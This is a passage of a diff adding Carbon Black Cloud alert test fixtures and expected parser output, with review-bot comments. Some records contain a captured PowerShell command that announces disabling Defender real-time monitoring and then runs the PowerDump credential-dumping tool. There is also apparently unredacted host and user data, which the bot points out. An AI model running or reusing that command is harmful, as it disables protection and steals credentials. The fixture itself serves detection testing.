x64","device_username":"demouser@demo.org","device_location":"OFFSITE","device_external_ip":"34.234.170.45","device_internal_ip":"10.0.14.120","ttps":["FILELESS","MALWARE_APP","MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER","MITRE_T1059_001_POWERSHELL","RUN_MALWARE_APP"],"attack_tactic":"TA0002","process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73","process_pid":3600,"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1","process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0","process_md5":"42a80cc2333b612b63a859f17474c9af","process_reputation":"KNOWN_MALWARE","process_effective_reputation":"KNOWN_MALWARE","process_cmdline":"\"powershell.exe\" & 
{Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}","process_username":"KOGNOS-W19-CB-3\\Administrator","parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed","parent_pid":4024,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_reputation":"TRUSTED_WHITE_LIST","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_username":"KOGNOS-W19-CB-3\\Administrator","childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000","childproc_effective_reputation":"RESOLVING","childproc_username":"KOGNOS-W19-CB-3\\Administrator","blocked_effective_reputation":"RESOLVING","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json new file mode 100644 index 00000000000..dc7b40c48f8 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json 
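Review bot: The two events in this fixture are scrubbed inconsistently: the first uses `demodevice`, `sample@demoorg.com` and `1.2.3.4`/`4.3.2.1`, while the second keeps `Kognos-W19-CB-3`, `KOGNOS-W19-CB-3\\Administrator`, `demouser@demo.org` and the public address `34.234.170.45`, which reads as unredacted tenant data carried into the repository and into the expected file below. Replace the hostname and usernames with the same placeholders as the first event and the external addresses with RFC 5737 documentation ranges; `1.2.3.4` and `4.3.2.1` are routable as well, so the first event benefits from the same change.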
@@ -0,0 +1,293 @@ +{ + "expected": [ + { + "@timestamp": "2023-07-17T17:15:51.708Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-07-17T17:16:50.960Z", + "backend_update_timestamp": "2023-07-17T17:29:19.996Z", + "category": "THREAT", + "childproc": { + "effective_reputation": "RESOLVING", + "guid": "ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000", + "username": "demodevice\\Administrator" + }, + "determination": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "value": "NONE" + }, + "device": { + "external_ip": "1.2.3.4", + "internal_ip": "4.3.2.1", + "location": "OFFSITE", + "os": "WINDOWS", + "policy": "SSQ_Policy", + "policy_id": 112221, + "target_value": "MISSION_CRITICAL" + }, + "is_updated": true, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "organization_key": "ABCD1234", + "parent": { + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 4024, + "reputation": "TRUSTED_WHITE_LIST", + "username": "demodevice\\Administrator" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "94953e4524c511ee86284f0541a5184d", + "process": { + "cmdline": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "effective_reputation": "KNOWN_MALWARE", + "guid": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "pid": 3600, + "reputation": "KNOWN_MALWARE", + 
"username": "demodevice\\Administrator" + }, + "reason_code": "T_REP_VIRUS", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "9e0afc389c1acc43b382b1ba590498d2", + "threat_notes_present": false, + "ttps": [ + "MALWARE_APP", + "RUN_MALWARE_APP", + "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER", + "FILELESS", + "MITRE_T1059_001_POWERSHELL" + ], + "type": "CB_ANALYTICS", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234", + "workflow": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:27:59.192Z", + "id": "411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234\",\"id\":\"411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"type\":\"CB_ANALYTICS\",\"backend_timestamp\":\"2023-07-17T17:16:50.960Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2023-07-17T17:29:19.996Z\",\"detection_timestamp\":\"2023-07-17T17:15:51.708Z\",\"first_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"last_event_timestamp\":\"2023-07-17T17:27:59.192Z\",\"severity\":5,\"reason\":\"A known virus (HackTool: Powerpuff) was detected 
running.\",\"reason_code\":\"T_REP_VIRUS\",\"threat_id\":\"9e0afc389c1acc43b382b1ba590498d2\",\"primary_event_id\":\"94953e4524c511ee86284f0541a5184d\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"value\":\"NONE\",\"changed_by_type\":null,\"changed_by\":null},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":true,\"device_id\":6948863,\"device_name\":\"demodevice\",\"device_uem_id\":\"\",\"device_target_value\":\"MISSION_CRITICAL\",\"device_policy\":\"SSQ_Policy\",\"device_policy_id\":112221,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows Server 2019 x64\",\"device_username\":\"sample@demoorg.com\",\"device_location\":\"OFFSITE\",\"device_external_ip\":\"1.2.3.4\",\"device_internal_ip\":\"4.3.2.1\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ttps\":[\"MALWARE_APP\",\"RUN_MALWARE_APP\",\"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER\",\"FILELESS\",\"MITRE_T1059_001_POWERSHELL\"],\"attack_tactic\":\"\",\"attack_technique\":\"\",\"process_guid\":\"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73\",\"process_pid\":3600,\"process_name\":\"c:\\\\users\\\\administrator\\\\appdata\\\\local\\\\temp\\\\powerdump.ps1\",\"process_sha256\":\"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0\",\"process_md5\":\"42a80cc2333b612b63a859f17474c9af\",\"process_effective_reputation\":\"KNOWN_MALWARE\",\"process_reputation\":\"KNOWN_MALWARE\",\"process_cmdline\":\"\\\"powershell.exe\\\" & {Write-Host \\\\\\\"\\\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\\\\\"\\\" -fore green\\nImport-Module 
\\\\\\\"\\\"$Env:Temp\\\\PowerDump.ps1\\\\\\\"\\\"\\nInvoke-PowerDump}\",\"process_username\":\"demodevice\\\\Administrator\",\"process_issuer\":[],\"process_publisher\":[],\"parent_guid\":\"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed\",\"parent_pid\":4024,\"parent_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"\",\"parent_username\":\"demodevice\\\\Administrator\",\"childproc_guid\":\"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000\",\"childproc_name\":\"\",\"childproc_sha256\":\"\",\"childproc_md5\":\"\",\"childproc_effective_reputation\":\"RESOLVING\",\"childproc_username\":\"demodevice\\\\Administrator\",\"childproc_cmdline\":\"\"}", + "reason": "A known virus (HackTool: Powerpuff) was detected running.", + "severity": 5, + "start": "2023-07-17T17:15:33.396Z" + }, + "host": { + "hostname": "demodevice", + "id": "6948863", + "name": "demodevice", + "os": { + "type": "windows", + "version": "Windows Server 2019 x64" + } + }, + "process": { + "command_line": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "entity_id": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "executable": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "powerdump.ps1", + "parent": { + "entity_id": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "sha256": 
"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "powershell.exe", + "pid": 4024 + }, + "pid": 3600 + }, + "related": { + "hash": [ + "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", + "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0", + "42a80cc2333b612b63a859f17474c9af" + ], + "hosts": [ + "demodevice" + ], + "user": [ + "sample@demoorg.com" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "sample@demoorg.com" + } + }, + { + "@timestamp": "2023-07-17T17:15:51.708Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "attack_tactic": "TA0002", + "backend_timestamp": "2023-07-17T17:16:50.960Z", + "backend_update_timestamp": "2023-07-17T17:18:03.397Z", + "blocked_process": { + "effective_reputation": "RESOLVING" + }, + "category": "THREAT", + "childproc": { + "effective_reputation": "RESOLVING", + "guid": "ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "determination": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "value": "NONE" + }, + "device": { + "external_ip": "34.234.170.45", + "internal_ip": "10.0.14.120", + "location": "OFFSITE", + "os": "WINDOWS", + "policy": "SSQ_Policy", + "policy_id": 112221, + "target_value": "MISSION_CRITICAL" + }, + "is_updated": true, + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "organization_key": "ABCD1234", + "parent": { + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 4024, + "reputation": "TRUSTED_WHITE_LIST", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "94953e4524c511ee86284f0541a5184d", + "process": { + "cmdline": 
"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "effective_reputation": "KNOWN_MALWARE", + "guid": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "pid": 3600, + "reputation": "KNOWN_MALWARE", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "reason_code": "T_REP_VIRUS", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "9e0afc389c1acc43b382b1ba590498d2", + "ttps": [ + "FILELESS", + "MALWARE_APP", + "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER", + "MITRE_T1059_001_POWERSHELL", + "RUN_MALWARE_APP" + ], + "type": "CB_ANALYTICS", + "url": "https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:15:33.396Z", + "id": "411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "kind": "alert", + "original": 
"{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"id\":\"411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"type\":\"CB_ANALYTICS\",\"is_updated\":true,\"detection_timestamp\":\"2023-07-17T17:15:51.708Z\",\"backend_timestamp\":\"2023-07-17T17:16:50.960Z\",\"backend_update_timestamp\":\"2023-07-17T17:18:03.397Z\",\"first_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"last_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"severity\":5,\"reason\":\"A known virus (HackTool: Powerpuff) was detected running.\",\"threat_id\":\"9e0afc389c1acc43b382b1ba590498d2\",\"primary_event_id\":\"94953e4524c511ee86284f0541a5184d\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"determination\":{\"value\":\"NONE\",\"change_timestamp\":\"2023-07-17T17:16:50.960Z\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"reason_code\":\"T_REP_VIRUS\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MISSION_CRITICAL\",\"device_policy_id\":112221,\"device_policy\":\"SSQ_Policy\",\"device_id\":6948863,\"device_name\":\"Kognos-W19-CB-3\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows Server 2019 
x64\",\"device_username\":\"demouser@demo.org\",\"device_location\":\"OFFSITE\",\"device_external_ip\":\"34.234.170.45\",\"device_internal_ip\":\"10.0.14.120\",\"ttps\":[\"FILELESS\",\"MALWARE_APP\",\"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER\",\"MITRE_T1059_001_POWERSHELL\",\"RUN_MALWARE_APP\"],\"attack_tactic\":\"TA0002\",\"process_guid\":\"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73\",\"process_pid\":3600,\"process_name\":\"c:\\\\users\\\\administrator\\\\appdata\\\\local\\\\temp\\\\powerdump.ps1\",\"process_sha256\":\"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0\",\"process_md5\":\"42a80cc2333b612b63a859f17474c9af\",\"process_reputation\":\"KNOWN_MALWARE\",\"process_effective_reputation\":\"KNOWN_MALWARE\",\"process_cmdline\":\"\\\"powershell.exe\\\" & {Write-Host \\\\\\\"\\\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\\\\\"\\\" -fore green\\nImport-Module \\\\\\\"\\\"$Env:Temp\\\\PowerDump.ps1\\\\\\\"\\\"\\nInvoke-PowerDump}\",\"process_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"parent_guid\":\"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed\",\"parent_pid\":4024,\"parent_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"childproc_guid\":\"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000\",\"childproc_effective_reputation\":\"RESOLVING\",\"childproc_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"blocked_effective_reputation\":\"RESOLVING\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "A known virus (HackTool: Powerpuff) was detected running.", + "severity": 5, + "start": "2023-07-17T17:15:33.396Z" + }, + "host": { + "hostname": "Kognos-W19-CB-3", + "id": "6948863", + "name": "Kognos-W19-CB-3", + "os": { + 
"type": "windows", + "version": "Windows Server 2019 x64" + } + }, + "process": { + "command_line": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "entity_id": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "executable": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "powerdump.ps1", + "parent": { + "entity_id": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "powershell.exe", + "pid": 4024 + }, + "pid": 3600 + }, + "related": { + "hash": [ + "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", + "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0", + "42a80cc2333b612b63a859f17474c9af" + ], + "hosts": [ + "Kognos-W19-CB-3" + ], + "user": [ + "demouser@demo.org" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "demouser@demo.org" + } + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log new file mode 100644 index 00000000000..00d440f9a01 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log 
@@ -0,0 +1,2 @@ +{"org_key":"ABCD1234","alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234","id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f","type":"CONTAINER_RUNTIME","backend_timestamp":"2023-02-06T00:13:37.663Z","user_update_timestamp":"2023-04-13T11:55:52.550Z","backend_update_timestamp":"2023-02-06T00:13:37.663Z","detection_timestamp":"2023-02-06T00:10:51.176Z","first_event_timestamp":"2023-02-06T00:09:19.320Z","last_event_timestamp":"2023-02-06T00:09:19.320Z","severity":5,"reason":"Detected a connection to a public destination that isn't allowed for this scope","reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c","primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-04-13T11:55:52.550Z","changed_by_type":"USER","changed_by":"sample@demoorg.com","closure_reason":"NO_REASON","status":"IN_PROGRESS"},"determination":{"change_timestamp":"2023-02-22T21:07:57.955Z","value":"NONE","changed_by_type":"USER","changed_by":"sample@demoorg.com"},"tags":["demotag"],"alert_notes_present":false,"threat_notes_present":true,"is_updated":false,"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"netconn_remote_port":443,"netconn_local_port":56618,"netconn_protocol":"TCP","netconn_remote_domain":"demo.remote.domain.com","netconn_remote_ip":"175.16.199.0","netconn_local_ip":"1.128.0.0","netconn_remote_ipv4":"175.16.199.0","netconn_local_ipv4":"1.128.0.0","k8s_cluster":"demo:demo-cluster","k8s_namespace":"kube-system","k8s_kind":"DaemonSet","k8s_workload_name":"ama-logs","k8s_pod_name":"ama-logs-gm5tt","k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06","k8s_policy":"Big runtime policy","k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","k8s_rule":"Allowed public 
destinations","connection_type":"EGRESS","egress_group_id":"","egress_group_name":"","ip_reputation":96,"remote_is_private":false} +{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f","id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f","type":"CONTAINER_RUNTIME","is_updated":false,"detection_timestamp":"2023-02-06T00:10:51.176Z","first_event_timestamp":"2023-02-06T00:09:19.320Z","last_event_timestamp":"2023-02-06T00:09:19.320Z","severity":5,"reason":"Detected a connection to a public destination that isn't allowed for this scope","threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c","primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61","workflow":{"status":"OPEN","change_timestamp":"2023-02-06T00:13:37.663Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","sensor_action":"ALLOW","device_target_value":"MEDIUM","device_os":"WINDOWS","device_location":"UNKNOWN","k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7","k8s_policy":"Big runtime policy","k8s_rule_id":"11111111-1111-1111-1111-111111111111","k8s_rule":"Allowed public 
destinations","k8s_cluster":"tomer:sensor-aks","k8s_namespace":"kube-system","k8s_kind":"DaemonSet","k8s_workload_name":"ama-logs","k8s_pod_name":"ama-logs-gm5tt","connection_type":"EGRESS","ip_reputation":96,"netconn_remote_port":443,"netconn_local_port":56618,"netconn_protocol":"TCP","netconn_remote_domain":"westeurope.monitoring.azure.com","netconn_remote_ip":"67.43.156.0","netconn_local_ip":"10.244.2.22","netconn_remote_ipv4":"67.43.156.0","netconn_local_ipv4":"10.244.2.22","remote_is_private":false,"process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33","process_pid":2100834,"process_name":"KUBERNETES_RUNTIME_NODE_AGENT","process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5","process_md5":"4cbdc5f51d0397b26886191b799131d5","process_reputation":"NOT_LISTED","process_effective_reputation":"RESOLVING","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json new file mode 100644 index 00000000000..0e2db8cc74a --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json 
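Review bot: The second sample in test-alert-container-runtime.log is only partly anonymized compared with the first: `k8s_cluster` is `tomer:sensor-aks` where the first sample uses `demo:demo-cluster`, and `netconn_remote_domain` is the third-party endpoint `westeurope.monitoring.azure.com` where the first uses `demo.remote.domain.com`. The IP addresses in both samples are already placeholder ranges, so this is a consistency point rather than a leak, but the cluster value appears to carry a personal name. Aligning the two samples, e.g. `"k8s_cluster":"demo:demo-cluster"` and `"netconn_remote_domain":"demo.remote.domain.com"`, and regenerating test-alert-container-runtime.log-expected.json, which repeats both values, would keep the fixture uniform.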
@@ -0,0 +1,190 @@ +{ + "expected": [ + { + "@timestamp": "2023-02-06T00:10:51.176Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-02-06T00:13:37.663Z", + "backend_update_timestamp": "2023-02-06T00:13:37.663Z", + "category": "THREAT", + "connection_type": "EGRESS", + "determination": { + "change_timestamp": "2023-02-22T21:07:57.955Z", + "changed_by": "sample@demoorg.com", + "changed_by_type": "USER", + "value": "NONE" + }, + "ip_reputation": 96, + "is_updated": false, + "k8s_cluster": "demo:demo-cluster", + "k8s_kind": "DaemonSet", + "k8s_namespace": "kube-system", + "k8s_pod_name": "ama-logs-gm5tt", + "k8s_policy": "Big runtime policy", + "k8s_policy_id": "2e5170e7-2665-49d2-829e-f5bdeefe6b06", + "k8s_rule": "Allowed public destinations", + "k8s_rule_id": "f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "k8s_workload_name": "ama-logs", + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "netconn": { + "local_ip": "1.128.0.0", + "local_ipv4": "1.128.0.0", + "local_port": 56618, + "protocol": "TCP", + "remote_domain": "demo.remote.domain.com", + "remote_ip": "175.16.199.0", + "remote_ipv4": "175.16.199.0", + "remote_port": 443 + }, + "organization_key": "ABCD1234", + "policy_applied": "NOT_APPLIED", + "primary_event_id": "X0z55sxeTGWPfKuzPkFlCg-61", + "reason_code": "2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "remote_is_private": false, + "run_state": "RAN", + "sensor_action": "ALLOW", + "tags": [ + "demotag" + ], + "threat_id": "0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c", + "threat_notes_present": true, + "type": "CONTAINER_RUNTIME", + "url": "defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234", + "user_update_timestamp": "2023-04-13T11:55:52.550Z", + "workflow": { + "change_timestamp": "2023-04-13T11:55:52.550Z", + "changed_by": "sample@demoorg.com", + 
"changed_by_type": "USER", + "closure_reason": "NO_REASON", + "status": "IN_PROGRESS" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-06T00:09:19.320Z", + "id": "f0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234\",\"id\":\"f0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"type\":\"CONTAINER_RUNTIME\",\"backend_timestamp\":\"2023-02-06T00:13:37.663Z\",\"user_update_timestamp\":\"2023-04-13T11:55:52.550Z\",\"backend_update_timestamp\":\"2023-02-06T00:13:37.663Z\",\"detection_timestamp\":\"2023-02-06T00:10:51.176Z\",\"first_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"last_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"severity\":5,\"reason\":\"Detected a connection to a public destination that isn't allowed for this 